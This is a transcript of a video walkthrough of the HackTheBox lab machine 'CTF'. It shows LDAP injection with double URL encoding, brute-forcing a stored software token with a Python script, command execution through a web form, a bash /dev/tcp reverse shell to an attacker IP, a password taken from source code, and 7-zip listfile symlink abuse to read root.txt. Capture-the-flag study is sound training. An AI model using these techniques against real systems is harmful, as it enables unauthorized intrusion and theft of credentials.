What's going on YouTube? This is Ipsec, and we're doing CTF from HackTheBox, which doesn't stand for Capture the Flag. It stands for Compressed Token Format, which is that string of digits that changes every minute when doing two-factor login. It's most commonly associated with RSA fobs, but there's also software implementations like Google Authenticator and things like that. I really like this box because number one, it starts off with LDAP injection, and I don't think we've done that before in a box. But number two, it's really one long, hard problem that becomes relatively easy as long as you enumerate properly and always type what you know. Because a hurdle you come across 20 minutes into the problem may be something you found out at the start, and if you don't draw that connection, you may just be stuck a long time and go down a rabbit hole you don't need to go down. So with all that being said, let's get in. As always, begin with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, pin the nmap directory and call it CTF, and then the IP address, which is 10.10.10.122. It does take some time to run, so I've already ran it. Looking at the results, we have just two ports open. The first one is SSH on port 22, and it's running OpenSSH version 7.4. Then we have HTTP on port 80, and that's running Apache HTTPD version 2.4.6, and it's also telling us it's a CentOS box. So whenever I see CentOS, I translate the name into Red Hat because Red Hat is the paid version of CentOS, and paid things are generally documented a lot better. So I'm just going to Google Red Hat HTTPD versions, and then we can probably go to the very first page, search 2.4.6, and we see 2.4.6 is supported by Red Hat Enterprise Linux 7. If it was 2.4.3.7, we know we're on a Red Hat Enterprise Linux 8 box, and of course, you can replace RHEL with CentOS, so this is just letting us know the version. Not a huge deal, but it is always nice to know in case you have to replicate the environment that you are attacking. So let's just go and check what's listening on port 80. Going over to Firefox and navigating to the page at 10.10.10.122 brings us up to the home page with a nice little note. As part of our SDLC, software development lifecycle, we need to validate a proposed authentication technology based upon software tokens. Please log in and do a test. The server is protected against some kind of threats, for instance, brute forcing. If you try to brute force, you may be banned by up to 5 minutes. If you get banned, it is your fault. So don't reset the box, and please let other people do work while you think a different approach. The list of banned IPs or wall of sheep may be found here, and you may not be able to view it while you're banned. So let's go check out that wall of sheep, and we just see the server status telling us the server is up, gives us the uptime of the server, and we have a list of banned IPs. You could try doing something like &cmd equals who am I to see if you can get this command to change, but it doesn't look like it. We can look at the page source to see if we have any idea there. It's not really telling us anything about how it's running top or why. So we can go back to the home page, look at the page source to see if there's any hints there. And it doesn't look like it. So might as well just get with what is asked and do a pen test on this login page. So we are granted with username and OTP or one-time password. So let's try logging in with please support me on Patreon and the one-time password of 1234. Click login, and we get that user is not found. So the first thing I'm going to do is try to do some type of cross-site scripting. I'm putting the bold HTML tag to see if this goes bold, and we get absolutely no response. So doesn't look like that's working. Can try something like double URL encoding to see if that fixes it. So if we do :b test 1234, let's just send this over to burp to make it a bit easier to edit. So do that, make sure burp intercept is on, click login, go to burp, and we can see it's already doing a lot of URL encoding. So I'm just going to press Control-Shift-U to undo that so we can see what's going on. So I definitely do want that URL encoded. So let's Control-Z to back out. And to double URL encode, we just highlight what we want hexed and then press Control-U. So % is %25. So we'll do that again. and then click forward to see if this bypasses any type of thing, and we get user is not found. So there is some type of blacklist because it just did not like our carrots, but we don't really have any information other than that. So just something that we should note in the back of our head. Press Control U to go to the page source to see if there's any hints here. And we have, we'll change the schema in the next phase of the project if and only if we pass the vulnerability assessment / pen test. At the moment, we have chosen an already existing attribute in order to store the token string, which is 81 digits. So at this point, I'm going to do a little bit of research because if we go back to this home page, let's turn burp intercept off. We have software token. We know this is a Linux box, so I'm just going to Google software token Linux. I'm going to see if we come up with anything. This very first page is giving us a SToken page, or GitHub for SToken, and this is going to create RSA Secure ID 128-bit compliant tokens. So I'm going to do man SToken to see if we have any more information. And let's see. SToken is a software token for crypto authentication. Let's see. Keep scrolling down. Just gonna search to speed this up. And under basic usage, we have pure numeric 81 digits, which that matches what our page source is saying, 81 digits. And then we also have CTF compress token format. So this is what the box's name is. So chances are SToken is the application we'll want to use to generate this token. Unfortunately for us, for SToken to work, we need to know the seed for the user. And we don't even know the user. So that's what we're going to start off and just try to enumerate usernames. So I'm going to do root 1234. Try to log in. We get user root is not found. So let us try the user guest 1234. Guest isn't found. Admin 1234. Admin's not found. We can try like SQL injection. So admin or 1 = 1 and 1234. We don't get anything back. So probably have to do some type of blacklist filtering. But instead of trying to evade a blacklist, the quickest thing to do is to brute force a name. Unfortunately, there is the blacklist protection, so we can't use big word list, but we should be able to use relatively small ones. So I'm going to do find user share seclist. I'm going to grep for username. And we can see there are two. I'm going to do xargs wc-l to see the number of lines. We have a 825 line one or a 17 line one. 825 may trigger the blacklist or block, so I'm going to start with this 17 one. So copy this here, and then we can take a look at the top usernames: root, admin, test, info, administrator, puppet, whatnot. So let's do wfuzz-h, and we want -d for post data. So wfuzz-d. We didn't know what parameters the page accepts, so going over to burp, looking at here, we have input username and input OPT. So let's do input username is equal to fuzz and input OTP is equal to 1234. And then -w for word list. We can just do top username short list. And then the URL, which is http 10.10.122/login.php, I believe. Going back here, yep, login.php. So go through this, and we see everything comes back as 68 lines, 233 words. The characters is a little bit off, but that's because the page is echoing the username back at us. So we can just do -- hide words, 233. And of course, we don't get anything back because none of those appear to be valid users. So let's try to fuzz the login form a bit more to find exactly what is blacklisted. So I'm going to go again in the user share sec list, This time I'm going to do fuzzing and copy the special characters file to my working directory. We can take a look at this. It's just a list of every special character. So we can do Wfuzz again with that. So instead of top usernames, we'll just replace this with special characters. And then we see 68 lines and 229 words. So it's saying 229 words because we just don't get anything. Remember, if we went into Firefox and put something like a caret, or not caret, a director, it doesn't say cannot find user. It just errors out. So looking at each of these, we can't do tilde, we can't do exclamation point, can't do wildcard, open parentheses, ampersand, close, plus, equals, pipe, backslash, directors. So oddly enough, the plus gives us 232 words. So let's see exactly why it's doing that. If we do username plus 1234, user plus is not found. Hide 233. I don't think it's counting plus as a word. That's funny, but yeah, it doesn't count this as a word. So that's why it's different. So if we wanted to, we could do two different approaches to do special characters. The first, or not special, double URL encoding. We could change this to -z, which allows us to specify different inputs. We could say file, comma, and then specify the file. And there's a third parameter that has URL encoding. So, or not URL encoding, just encoder. I'm going to put something here. It's not going to work because I don't know what it is. I do wfuzz-e encoders, and it's going to list what is there. We can convert everything into hex or double hex. So we want to do double hex. So if we do comma URI underscore double hex, we can see what special characters do. And let's see. I don't exactly like this because it doesn't do everything. Like valid URL characters, it doesn't encode. So instead of doing it that way, which some people may think is the correct way, I'm just going to do it the lazy way and specify a different word list. So let's go to user share sec list, and then fuzzing, and then it's like double URI hex, and double is spelled weird. And this is just %25, and in case you didn't know, %25 is the hex for a percent. So it's kind of like Inception there. So 25, we see 25 is %. So what we're doing with this word list is just hoping that the BlackList is being applied before the application does URL decoding. And we're also hoping the application will double URL decode. So take 0x41, that is always going to be A. If you do buffer overflows, you'll probably know that address range off the top of your head. So if you just sent the server %41, it's going to know to decode that into A. But this is where the BlackList may be applied. So it may say, if this is A, then block, because they don't want you sending 100 A's to cause a buffer overflow. So maybe that's how their filter works. Well, if you set this to %2541, it will pass this check, and then maybe the application will do a decode on it to turn that into %41, and then it may just decode it again because applications don't want to fail and realize that is A, and you have successfully bypassed their BlackList. So essentially, that is how this double URL encoding is working, and we're just going through every single hexadecimal value. So let's do that Wfuzz again, and instead of doing special characters, we will do double URI hex, and then hope we don't hit the BlackList because this is sending quite a few characters. So it's looking like everything is good, and we got a few characters in before we got blocked. We can always check if we got blocked by clicking on a page, and if it responds, we are not blocked. so that is good. The first character it barfs on is %2500, which is null byte. So that is good to know that null byte is doing something weird. We have %25, which again, %28. I don't know what 28 is, so let's just do man ASCII again. What the hell? How do I spell ASCII? Oh, it's 2 I's. There we go. I don't know why I had a brain fart right there, but we can look at 28, and that is going to be open parenthesis. Then 29 is close parenthesis. So we probably should be taking notes. So v notes, application barfs at null byte, closed, open, 2a. We can see that's right here. That is going to be a star. So let's go up, star. And the last one is 5c. So search for this. Not found below. Search up. And backslash. So thinking about this a little bit, I recognize a lot of these characters as LDAP things. Not really SQL injection. Blacklisting parentheses in SQL may be a bit odd. I would expect things like dashes, pounds, and other things to be like causing issues with SQL. But just based upon parentheses, wildcard, and backslash, I jump over to LDAP. So in order to understand LDAP, if this whole thing didn't make sense, you have to understand kind of how the LDAP parameters work. So let's do LDAP Structure .note, and essentially an LDAP query looks like this. It's a bit weird because the comparison is at the very beginning. So it starts off with like a parenthesis ampersand or a parenthesis pipe. Ampersand means and, this means or. So it starts off with this, and then you do values. So this may be like password is equal to ipsec_rocks, and then this could be UID for user is equal to please sub. So this query means we could do, trying to think in SQL terms. So we could do this being like select star where UID or username is equal to please subscribe and password is equal to ipsec_rocks. If this was this would be select star from where UID is equal to please subscribe or password equals ipsec_rocks. So hopefully that makes sense. Just keep in mind this means and these combine. If you wanted to do multiples, you could do like this, and then we'll just do that later actually. You have to understand that later for nested LDAP queries. But knowing this, you can see why our application is barfing, because we're putting a null byte here, which means it's terminating this query. So it fails because we ended with these two parentheses. We could test a theory by putting two parentheses then a null byte and seeing if that succeeds. So let's go over to perp to validate what we believe. So going over to proxy, we can just go to this request, send it to repeater, and we'll say test, click go, and this will say username test. We'll do username is equal to please sub. Please sub, and then search for please sub. User please sub is not found. So if we put a %2500, which is what our Wfuzz did, remember this is doing double URL encoding, so this is just a plus, and then sending null byte. We get please sub is not found. So what we did, we terminated the query, right here. So what we want to do is add parentheses until this is valid. So if we go back here, we can do %25, and then I think it's 29. I think that was the closed parenthesis. We could just do closed, and then highlight this, convert URL, encode all characters, and that is 29. So we just want this. Click go. Please subscribe is not there. Paste this again. Click go. Please is not there. Let's do this one more time. Click go. And we got a match. So at 3 closed parentheses, our query was successful. So we know what these two are, because the first parenthesis closed out our UID. The second parenthesis closed out our comparison, that ampersand. But we got a third one here, which is weird. So we know there's a nest here that we don't know about. So it could be like ampersand, and then close this out, and then open a new one. This is unknown territory, unknown, and then comparing something, and then closing that out, closing this. So we did that because we knew there were 3. So that meant there was one above additional nest. And this is confusing. We'll just put ampersand here. If I can type. I'll leave it at pipe, because I just apparently can't type. My mic's in the way of looking at viewing my keyboard. So this is what the query looks like. And again, we validated that because of the null byte. So let's look at other things. We knew what this did, because that just offset the balance. If we put in a parenthesis, it's just an uneven balance of parentheses, so query fails. Same with the other way. If we do wildcard, this one is really different, because that's giving us 231 characters. So let's try injecting that. So going back to burp, we can just do %252a, which is the wildcard. Click go, and we get, let's see, do we have not found? We just get cannot log in. So this is different. This isn't found. This is not cannot find user. It's cannot log in. So we hit a valid username with a wildcard. So if we just brute force all the characters, maybe we can find out the user, because if there's any user that begins with A and then we have a star, it would probably be cannot log in. So because it says A, wildcard not found, we can do B, not found. But instead of doing this all manually, let's go back over into Wfuzz and do this more automatic. So to do that, we'll probably have to copy another word list out of user share sec list. So this is going back to, let's just do find, and I want to do grep care. So this is the one I want. And all care is a list of everything A to Z. So what we're going to do, Wfuzz input username is going to be fuzz, which is going to be a character. And we're going to do %25, which is a %, 2a, which is the wildcard. And the word list is just going to be care. So click and go. We get only one hit back, that is L. So if we did this back in burp, we do L252A, we'll see cannot log in. So we can keep going down this path. If we do Lfuzz, we get D, then we do LDFuzz, we get A, and then we do P, and you kind of get where we're going. If we kept doing this, it would show LDAP user, and at the end of user, we don't get any more hits back, so we know that user is probably existing. We can validate that by just trying to log in with the user, LDAP user, one-time password of something, and we get cannot log in. If we did LDAP use without that the user doesn't exist. If we do LDAP user or use and then %2a, and I think our browser will do this URL encoding. 1, 2, 3, 4 cannot log in. So we know the username is LDAP user. If we go back to this, we can create a query now. So we're injecting here LDAP user. We know the application is appending this. So what we could do is put another comparison and put the variable attribute is equal to star. And we won't close this out because the application is going to do that. And what this is going to do is tell us what attributes are in LDAP. And that's kind of how LDAP works. Again, this box is going to be hard if you don't understand LDAP. If you search IPsec LDAP, maybe there's videos. I know we've gone over it. I'm just not sure how well. But LDAP has a bunch of default attributes. And if you went back to, I think it's this page in the source, at the moment we have chosen an already existing attribute. And these are just like variables a user can have. So this would be like home directories, phone numbers, address. Essentially, any extended attribute in Active Directory is an LDAP attribute. So if you do LDAP payload, is it payload all the things? Yep, that's the repo. This has one for LDAP injection, intruder, and LDAP attributes. So this is an awesome thing of just all the default LDAP attributes that are there by default. So what we want to do is copy that word list into a location. I'm just going to locate attributes, or is it attribute? Attributes. Attributes.txt. I do have the payload all the things repo saved on my Kali. So I'm going to copy this. I'm just going to call it attributes.txt. And again, you can see the contents of this file as just this. So what we're doing here is going to verify what attributes exist. And I hate typing double URL encoding, so we're just going to do this in burp repeater and then copy it into Wfuzz. So I'm just going to go here, and we have to type LDAP user, and then we're going to close out the parenthesis, open the parenthesis, fuzz, and fuzz is going to be each one of these is equal to star, which means anything. And we're not going to close out the parenthesis because if we did, we'd have an uneven number because the application is closing it for us. So the first thing I'm going to do, highlight everything, Control U to URL encode it, and I see it's only encoding that equal sign because everything else it doesn't have to. But we definitely want it to, so I'm just going to highlight those things, do convert selection, URL encode, and Control U is only doing key characters. We want to do it all. And then I also want to do these parentheses, so convert selection, URL, all characters. And then if I highlight the whole thing, press Control U, it's going to encode each percent into %25. So this is the query I want. So let's highlight that, Control X to cut it or copy, and then we want to go back to our Wfuzz And we're going to change this input username. We'll just do shift insert, and that's going to paste our query we want, and then change char.text, which is the word list, to attributes.text. And we can see all the attributes that are valid, which is common name, CN, name, mail, object class, pager, password, SN, surname, and UID. So we want to get the software token out of this, and we can do it the same way we did the username. We can brute force any of these fields, but I'll leave that as an exercise for you. We're going to focus on the software token, which we know is 81 digits. So where would you generally store 81 digits? Probably the pager attribute, because no one uses pagers anymore, and it's meant to hold numbers. So that's the one we're going to choose. So if we go back to our query, we want to do pager is equal to something, and that's going to be a number. And we know it's going to be 81 digits long. So I don't want to do, what is it? The Wfuzz 81 times. Let's create a script to make our lives a bit easier. So we'll do vi brute.py and begin the creation. The first thing we do is let everyone know this is a Python 3 script, and then we'll need to do our import statement. So we definitely want to do something with the web browser, so we're going to import the request module. We'll probably want to import sleep, so we'll do from time import sleep, because we don't want to be caught brute forcing. We have to be kind. Then we also need a list of digits. So I'm going to do from string import digits. And then to make your life easier, if you want to go further, I'm going to import ASCII lowercase. And all this does is if we do print digits, print ASCII lowercase, it's going to create those variables for you. So Python 3, brute.py, we can see it printed 0 through 9 and A through Z. So that's all that import statement does. Then we probably want to give token is equal to nothing. And I'm going to do 4 digit in digits. And it's going to go loop through each number. We're going to set token is equal to token. So right now we're setting it to nothing. And then we're going to do query is equal to LDAP user. And I'm not double URL encoding it here because I believe request will encode this for me. If we did %25, we'll do a triple encode, which I don't know would work. So we're just doing %29, which is going to be that close bracket or close parenthesis, then 28, which is the open parenthesis, and we want to specify attribute, and then %3d, which I think is the equals. If we go to a new pane, man ASCII 3d is equals, and we want token, and then we'll do digit and 2a for a wildcard. So again, what that's doing, I wonder if I can do a comment like this. This would be LDAP user, then attribute was pager is equal to token star. So that's all that query is. And we need to declare attribute. So we'll do attribute is equal to pager. Okay. So now we can do the post request part. So data is equal to input username, and that's going to be query. And then we want input OTP. I think that's all capitals. Go back to burp. OTP is all caps. We can say 1, 2, 3, 4. So that is done. And now we can crawl. So request is equal to request.post, and URL data is equal to data. And we also want to declare URL is equal to http 10.10.10.122 login.php. Okay. And then if cannot log in is in the text of this response, print f success, and this is digit. And we can break out of this. So this is going to be our test. So let's see if this works. Python 3 brute.py, and we got nothing. So that did not work. So let's do proxy is equal to HTTP, and is it just localhost 8080, and this will be proxies is equal to proxy. No, not there. My bad. It goes in the request portion. Proxies is equal to proxy. I think I set that correct. So now we can go back into Brute, turn intercept on, and let's see if we intercept it. We do. Send this to repeater, and let's look at this. Do we get anything? No, we don't. Let's Control U to decode that, Control U again to decode again, and I have 2 closed. So that's probably what I screwed up on. So go into Brute. Let's see. 2929. It's 2928. We turn intercept off. Let's see if this time we hit it. Success 2. So the very first character is 2. And then if we say token is equal to 2, we can get the next character. But we don't want to be in the business of doing this 81 times, so now like 80 times. So we have to create a loop around this. Let's go to the beginning of our for loop, press Shift V to enter visual mode, highlight everything, and then do, I think, the greater than sign. That is this one that I did to indent everything. And I'm going to do a lazy way to get this done. While loop is greater than 0, and we can say loop is equal to 1. And then down here we can do else if digit is equal to 9. I believe that's going to be casted as a string, which is why I put the 9 in quotes. I think we need 2 equals. And this will be loop is equal to 0 break. So what that's doing is if we ever hit 9 and we don't have a match, then the script's done, and we're going to set loop to 0 to end our while loop and exit everything. And what we also have to do is say token is equal to token plus digit. And I think it's treating everything as a string, so that's not going to do math, hopefully. But we will find out. So go here, success 8, success 5, 4, 4. That was weird. So let's see, success digit. We want to do success token. Oh, we got banned. That's why it stopped there. Crap. We do Python brute, success 28, 285, 2854. Maybe we didn't get banned. I don't know why it just randomly stopped, but we definitely need a sleep. So I'll put a sleep upon success. Let's be extra paranoid and put the sleep on every single request. And we can say go, and this will be success 2. Wait, our token is set to start at 2. We don't want that. So success 2. And then we're going to wait a little bit because it has to get to 8. So that would probably be 8 seconds. So 3, 2, 1. I suck at counting or keeping track of time in my head. There we go. Success 2-8. So let's add a little flair to this to make it so we can see progress. So what I'm going to do is import sys, and we're going to change this print statement. So we can do get rid of this. And right here where sleep is, we can do sys.std_out write, and then /return to do a line token and token digit. So what this is going to do is keep overwriting what it's printing and tell us what digit it's working on. So this should look pretty cool as long as we remember to close out that parenthesis. Click Python brute, token 0, 1, 2, and now moving to the next character, and this will hopefully go at 8, and it will take up to 81 characters. So we're just going to let this go. And I'm going to speed up the video because you can imagine how long this would take. And there we have, the token is complete. If we copy this, we can do echo-n, paste, wc-c, and we have 82 characters. So somewhere we have screwed up. It's probably that 9, the trailing character, because, well, 9 is the very last number. And if you look back at our script, we're printing out the token, so we never go and delete that. So we can put a to do, and these would be tasks for you. BruteForce all attributes, may need to use ASCII lowercase and such. And then we got another to do, last character printed is bad, disregard. So some fun things, but we got the token. I'm going to create token.txt and paste it just so we always have it, and then we can validate it works. So we go to burp, intercept is set to off. If we go back to Firefox, go to the login form, LDAP user, paste the token, we can't log in. But if you remembered from early in the video, we use something called SToken, that software token. So what I'm going to do is do apt search SToken to see if it's an apt, and we can just do apt install SToken to install it. And now with it installed, we can do --help to see how to use it. We want --token is equal to the token string, and then hit enter, and then it says enter pin. I'm just going to enter nothing first. Looks like my computer hung. There we go. It says pin must be 4 to 8 digits. Use 000 or 4 zeros for no pin. And we can copy this and paste it here. And we still don't get it working. There is one thing to keep in mind when you use time-sensitive tokens or one-time passwords, and that is the time. So I'm going to go to burp, and we're going to go back into this repeater tab. And it doesn't matter which query we do. We're just going to click go and look at the time. So that is weird. The expiration date is 1981. So there's probably not a like security finding, but just like a notice of your cookies are set to expire in the past, which is weird. But looking at the date of the server in this header, we can see the server thinks it is, I think that's 9:55 GMT, and we are a few minutes ahead of it. So what we have to do is set our time. So I'm going to go in terminal, and I'm going to set our time to be the 57th minute of last hour. So I'm going to do date-s 17:57, and we see my date didn't change at all. So what I'm going to do is we're going to check our settings to see if our VM is taking over time. We see time sync is off. So what I'm going to do is issue the command time date CTL set NTP 0. This is network time protocol. We're disabling it. So now when I do date-s 1757, we see it updates here. So now let's do that SToken again. I think it's --pin is equal to 4 zeros, so we don't have to do that every time. We can copy, go to LDAP user, paste, and we get a different thing now. We have command and OTP. So I'm going to issue the command who am I, and we're going to go back to the pin. It's still the same. Click submit. User must be a member of root or ADM group and have a registered token to issue commands on the server. So we're probably not a member of root or ADM. However, now something's making sense. If we went back to the query, when we enumerated exactly how this worked, we have this second one. So user must be a member of. So we have this nested thing, and again, we found out it was nested based upon the null byte and doing enumeration that way. So now we have group is equal to ADM or group is equal to root. So what if we just put a null byte here and terminated the query after LDAP user? So let's try that. And maybe we can get the query to never execute the second parameter, which is ADM or root. So let's go log out, log in, and we're going to specify LDAP user. And then let's go to burp to type this out because I hate doing URL encoding. So LDAP user 1, 2, 3. And we need to URL encode all three of these. So convert selection, URL, all characters, and we also have our null byte. So let's send this in. And keep in mind, our web browser is going to take each of these and encode that for us. So that's why we're not doing double URL encoding. So we can go back to SToken, paste that to xclip, selection, clipboard, and that just automatically put it in our clipboard to copy and paste. Click login. Cannot log in. So we screwed something up with our user. So 292929 null byte. I thought that worked before. We can try. Let's just do it manually. So LDAP user 1234. Let's intercept this. So proxy intercept on, log in. We have to set burp to be intercepted. LDAP user 1234. Maybe I just didn't copy the token quick enough because it said cannot log in. So that was probably what happened. But let's paste. Let's see. I have 751 on my clipboard. If I do this, I have a different token. So it's definitely not that, but let's do this manually. So go back to this repeater. Since we don't have a web browser now intercepting to do the WRL encode, we do it by just highlighting and pressing Control-U. We can copy this, paste that in, and now we got to do this one-time pad. So, or one-time password. Copy, burp, paste, forward, and let's see. We're now logged in. So the command to issue, we can do who am I, paste the token, and we get the answer back, Apache. So we can do, let's try a reverse shell, bash-c, then we can do bash-i, I think it's this, dev tcp 10.10.14.3, 9001, and then 0 at and 1. Let's make sure that's right before we do this. So we can turn Foxy Proxy off, Pentester Monkey, rev shell, go to the cheat sheet, bash-i, greater than ampersand, and then 0 greater than ampersand 1, 0 greater than ampersand 1. Okay. So the reason why I always do bash-c before it is because this is a very bash thing. So if I'm not in a bash shell first, this doesn't exist. So that's why I wrap everything in bash-c. So we can try this. So to try it, we have to do, and we'll do a netcat session in this window, nclvnp 9001, copy that, go to the browser, paste. We don't get anything back. We don't have a shell. So maybe there's a firewall involved. Let's try a port that is generally allowed outbound, 443. So copy token, issue the command again, submit, cannot authenticate. It's probably just time thing, so let's try this again. Submit, cannot authenticate, 061792. Different token, paste. Okay, so that time it worked, but we didn't set the port to 443. We're not getting anything back. If we go to a terminal, we have a reverse shell as the Apache user. Awesome. So let's do python-c, import pty.spawn, bin bash. Out of pty devices. I don't know what happened, but we just won't be able to upgrade our shell because we got just a weird error message. So in order for LDAP to work, we have to do things like bind to the LDAP server, which is a authentication, unless anonymous bind is allowed, but let's just check this. So let's cat login.php and see how it connects to the LDAP server. We have the username as LDAP user. We have this password, and then we can see LDAP host, LDAP://ctf.htb, username, connect. So search down, password. And here we go. Here's the bind request of us trying to connect with the user, LDAP user, and that password. So let's try SSHing into the box with LDAP user at 10.10.10.122. I'm going to make sure the password is on my clipboard. It is if I do Control-Shift insert. So just wait for that login prompt. And then Control-Shift insert. And we get logged into the box. So we have two shells on the box. The first one is running as Apache, and the second one is running as LDAP user. Do ls-la, we can get user.txt, so we can definitely read this file. So let's just enumerate the box some more. And I'm doing everything in this shell because we have a proper PTY where I can do tab autocomplete, I can clear the screen, etc. It's just much nicer to work with than that reverse shell. So if we look at the root directory, we have a non-standard directory called backup. And going into backup, we have a bunch of files, and if we look at the timestamps on everything, everything is within a minute. So something runs every minute to create this file. There is error.log with no contents, and there is also honeypot.sh. So let's look at honeypot.sh to see what's happening. And this looks like the script that handles banned users. So let's see. Now date plus s. So if the path isn't secure, we can probably inject somewhere because they're not using absolute paths. So the first thing I'm going to do is echo my path to see if there's any non-standard things. And what I mean, we do which date. Date is in user bin. So user bin. So it's going to go here. If we had write access to here and created a program called date, we could hijack the date colon honeypot.sh. But if we touch user local bin test, we can't write there. So that attack path isn't going to work. We got a password, and the password is using something out of root.txt, which obviously we can't read. So keep the last 10 backups. This is doing a ls stir.zip, grabbing the 11 and removing everything after that. So that looks fine. Now we're getting files from the honeypot to back them all up. Var www HTML uploads, 7-zip archive, filename.zip, which is that backup name, -t7z. I'm guessing -t is probably compression format. -snl, I don't know. -p for the password. -- generally means arguments are done. Everything after that is a file. And what that's preventing us doing is creating files with like -something to force the execution of a command. I know the Joker video, I've abused that, but there's a few videos that have abused it. But since that's there, we can't send arguments into 7-zip. And then we have truncate -s0 on the error log to erase it. So let's go and look at everything that 7-zip is doing. So man 7-zip A for archive, and I want to look at what -t is. That is type, so we are correct. That is specifying the compression type. SNL, let's see, SNL. This is going to store symbolic links as links. So what this is meaning is if we just put a symbolic link to root.txt, it's not going to go grab that file and put it in the archive. It's just going to put the link in the archive. So it doesn't help us at all. And that's about it. It does support something called list files. And list files means like we can tell 7-zip the names of the file are in this zip, if that makes sense. So if we created the, I'm just going to make temp so we can delete this afterward. If we created the file please sub and then created please sub without that @ sign and then said root.txt test ABC, it would archive all of these files into the zip. So we can trick that into doing a symbolic link, having it go to that link, and then archive the contents of that link, if that makes sense. Hopefully it does. If it doesn't, it probably makes sense after we abuse it. So the first thing to do is go into var www HTML and see if we can create files. So cd var www HTML, go to uploads, and we can't create files. If we do lsla in this directory, we can see the Apache user can, which our netcat shell is the Apache user. So we can do cd var www HTML, go into uploads, and we can touch and create files. So what I'm going to do is go into backup. Actually, we'll do this all from this shell. So look at the date. We have 50 seconds, or 40 seconds now. I'm going to touch, please sub. Now we're going to create a symbolic link from root.txt. Whoops. ln-s root.txt. I'm going to call this please sub lsla. If we go in backup real quick, tail-f error.log. I probably didn't hit this time. Wait, do we not have permissions in backup? Okay, we don't have permissions in backup as the shell, so we have to do it from this shell. Tail-f error.log. We probably missed that timing window. So let's redo this. Vir www HTML uploads. Directory is clean, so touch at please sub ln-s root.txt to vir www HTML uploads please sub. Make sure we hit that timing window so we see both files. So what is going to happen is it's going to see we're doing a list file. It's going to go into a file and pull the contents of it, and each line in this file is going to try to archive. And each file that doesn't exist, it's running to the error log, which we are viewing. So it's going to go into root.txt, and hopefully it can't read the hash that's in root.txt because that file doesn't exist. And if that's the case, it's going to output it an error. So if we do lsla, it hasn't ran yet. Date, it's going to run in a few seconds. And there we have it. It ran actually twice. So we see the hash there. If we go back to the snetcat lsla, or ls-la, it deleted the file, but there you have it. That is the box. If you want to do more work, I would highly recommend creating a Python script that uses the terminal to log into the application and execute commands here. Instead of doing a reverse shell, you could do this box with just like a command prompt and running commands one at a time, like base64 login.php to get the password, and then doing the touch commands from here and doing it all within Python without a reverse shell. It's a pretty tough thing to code. So, and there's also the to-dos in the other script. So hope you guys enjoyed the video. I'm sorry I don't know a way to get to the actual root user, only read the text flag. So maybe there'll be a write-up someone else did that actually gets code execution as root. That's it. Take care. See you all next week.